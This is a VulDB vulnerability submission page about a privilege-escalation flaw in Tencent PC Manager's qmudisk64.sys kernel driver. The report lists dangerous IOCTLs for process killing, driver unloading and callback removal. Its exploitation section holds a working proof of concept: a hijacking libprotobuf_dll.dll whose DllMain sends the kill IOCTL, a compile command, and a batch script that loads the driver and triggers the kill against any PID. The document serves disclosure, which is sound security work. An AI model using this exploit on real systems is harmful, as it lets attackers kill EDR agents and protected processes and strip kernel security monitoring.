提出 #848643: Tencent PC Manager 18,1,30242,301 Improper Access Controls情報

タイトルTencent PC Manager 18,1,30242,301 Improper Access Controls
説明# Tencent QMUDisk Driver Privilege Escalation Vulnerability ## Executive Summary A critical privilege escalation vulnerability exists in Tencent PC Manager's kernel driver `qmudisk64.sys`. The driver exposes **multiple dangerous IOCTL interfaces** across 4 device symlinks that allow any process with a valid RSA signature (embedded in Tencent executables) to: 1. **Terminate arbitrary processes** (including PPL-protected processes, EDR agents, system services) 2. **Unload arbitrary kernel drivers** (EDR drivers, security filters, monitoring components) 3. **Remove kernel security callbacks** (PsSetLoadImageNotifyRoutine, ObRegisterCallbacks) 4. **Bypass Windows security boundaries** completely The RSA signature validation can be trivially bypassed through **DLL hijacking** of legitimate Tencent executables, allowing any unprivileged user to gain complete control over system security infrastructure. **Vendor:** Tencent **Product:** Tencent PC Manager (腾讯电脑管家) **Affected Component:** `qmudisk64.sys` kernel driver **Vulnerability Type:** Privilege Escalation / Arbitrary Process Termination / Driver Manipulation / Security Callback Bypass **Attack Vector:** Local **Privileges Required:** Low (any user can execute Tencent signed binaries) **Impact:** Complete system compromise, EDR/AV bypass, protected process termination, kernel security infrastructure removal --- ## Vulnerability Details ### Root Cause The driver creates multiple device symlinks accessible from user mode: - `\\.\QMUDisk` - Main device (requires RSA signature validation) - `\\.\ODAY_{3EEEDE5F-C832-4126-AA30-0DC8A81FA22E}` - Kill/Unload device - `\\.\SL_{2A9C5798-6880-4D52-8A27-5C70090D96E8}` - Callback removal device - `\\.\{C881BF08-7F3A-4227-9F7D-D18DEE8A45AE}` - Additional control device The driver implements RSA signature validation to restrict access, but this protection can be bypassed through **DLL hijacking** of legitimate Tencent executables. ### Vulnerable IOCTLs The driver exposes **multiple dangerous IOCTLs** across different device interfaces: #### Device 1: `\\.\ODAY_{3EEEDE5F-C832-4126-AA30-0DC8A81FA22E}` **IOCTL 0x2224C8 - Kill Process** - **Function:** Terminates arbitrary process by PID via `ZwTerminateProcess` - **Input Buffer:** ```c struct KillRequest { ULONGLONG target_pid; // +0x00: Target process ID ULONGLONG reserved1; // +0x08: Unused ULONG reserved2; // +0x10: Unused ULONG result; // +0x14: Output status }; ``` - **Impact:** Can kill any process including PPL-protected processes, EDR agents, system services **IOCTL 0x222018 - Unload Driver** - **Function:** Unloads arbitrary kernel driver - **Impact:** Can disable security drivers, EDR kernel components, antivirus filters #### Device 2: `\\.\{C881BF08-DA7F-4a47-8462-E111F3A90100}` **IOCTL 0x2225C0** - Memory/Process Operations **IOCTL 0x2225C4** - Additional Control Functions **IOCTL 0x2225C8** - System Manipulation **IOCTL 0x2225CC** - Advanced Operations **IOCTL 0x2225D0** - Extended Functionality *(Full analysis of these IOCTLs available upon request)* #### Device 3: `\\.\SL_{2A9C5798-8D9E-4B8A-96F2-6EC5A5B40195}` **Function:** Callback removal and security feature bypass - Removes kernel callbacks (PsSetLoadImageNotifyRoutine, ObRegisterCallbacks) - Disables security monitoring hooks #### Device 4: `\\.\QMUDisk` (Main Device) **Function:** General driver control and configuration - Requires RSA signature validation - Primary interface for legitimate Tencent operations **Kernel Implementation:** ```c // Pseudo-code from IDA analysis NTSTATUS DispatchDeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) { ULONG ioctl = IoGetCurrentIrpStackLocation(Irp)->Parameters.DeviceIoControl.IoControlCode; if (ioctl == 0x002224C8) { // Kill process IOCTL ULONGLONG target_pid = *(ULONGLONG*)Irp->AssociatedIrp.SystemBuffer; HANDLE hProcess; // Open target process with PROCESS_TERMINATE CLIENT_ID cid = { (HANDLE)target_pid, NULL }; OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, 0 }; if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_TERMINATE, &oa, &cid))) { ZwTerminateProcess(hProcess, 0); // Kill without validation ZwClose(hProcess); } } // ... } ``` **Critical Flaw:** No validation of: - Caller privileges - Target process protection level (PPL/PsProtectedProcess) - System process restrictions (PID 4, csrss.exe, etc.) --- ## Exploitation ### Attack Vector: DLL Hijacking Tencent ships multiple executables with embedded RSA signatures that pass driver validation: - `QQPCRTP.exe` (32-bit, loads `libprotobuf_dll.dll`) - `QQPCTray.exe` (64-bit, various DLL dependencies) - Other Tencent components **Exploitation Steps:** 1. **Driver Loading** (requires admin once): ```cmd sc create QMUDisk type= kernel binPath= "C:\path\to\qmudisk64_ev.sys" sc start QMUDisk ``` 2. **DLL Hijacking Setup**: - Place malicious `libprotobuf_dll.dll` next to `QQPCRTP.exe` - DLL exports all required functions as stubs - `DllMain` contains exploit payload 3. **Trigger Exploit**: ```cmd set KILL_PID=1234 QQPCRTP.exe ``` 4. **Exploit Flow**: ``` QQPCRTP.exe launches → Loads libprotobuf_dll.dll (hijacked) → DllMain(DLL_PROCESS_ATTACH) executes → Driver validates QQPCRTP.exe RSA signature ✓ → CreateFileW("\\.\ODAY_{3EEEDE5F-...}") succeeds → DeviceIoControl(0x002224C8, target_pid) → Kernel calls ZwTerminateProcess(target_pid) → Target process terminated (even if protected) ``` --- ## Proof of Concept ### Malicious DLL (libprotobuf_dll.dll) ```c #include <windows.h> #define IOCTL_KILL 0x002224C8 #define DEVICE_PATH L"\\\\.\\ODAY_{3EEEDE5F-C832-4126-AA30-0DC8A81FA22E}" static void do_kill(void) { char buf[32] = {0}; if (!GetEnvironmentVariableA("KILL_PID", buf, sizeof(buf))) return; DWORD pid = (DWORD)atoi(buf); if (pid == 0 || pid == 4) return; HANDLE hDev = CreateFileW(DEVICE_PATH, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if (hDev == INVALID_HANDLE_VALUE) return; BYTE ioctl_buf[24] = {0}; *(ULONGLONG*)&ioctl_buf[0] = (ULONGLONG)pid; DWORD returned = 0; DeviceIoControl(hDev, IOCTL_KILL, ioctl_buf, 24, ioctl_buf, 24, &returned, NULL); CloseHandle(hDev); } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hinstDLL); do_kill(); } return TRUE; } ``` **Compilation:** ```bash i686-w64-mingw32-gcc -shared -o libprotobuf_dll.dll dllmain.c stubs.c exports.def -lkernel32 ``` ### Full Exploit Script ```cmd @echo off REM Tencent QMUDisk Arbitrary Process Kill PoC REM Usage: exploit.bat <target_pid> set TARGET_PID=%1 if "%TARGET_PID%"=="" ( echo Usage: %0 ^<target_pid^> exit /b 1 ) echo [*] Loading QMUDisk driver... sc create QMUDisk type= kernel binPath= "%CD%\qmudisk64_ev.sys" sc start QMUDisk timeout /t 2 /nobreak >nul echo [*] Killing PID %TARGET_PID%... set KILL_PID=%TARGET_PID% start /wait QQPCRTP.exe echo [*] Cleaning up... sc stop QMUDisk sc delete QMUDisk echo [+] Done. Check if PID %TARGET_PID% is still alive. ```
ソース⚠️ https://github.com/subsubsub1231/qmukiller
ユーザー
 Anonymous User
送信2026年06月05日 04:44 (1 月 ago)
モデレーション2026年07月12日 13:02 (1 month later)
ステータス承諾済み
VulDBエントリ377844 [Tencent PC Manager 18.1.30242.301 QMUDisk Driver qmudisk64.sys 特権昇格]
ポイント20

Do you know our Splunk app?

Download it now for free!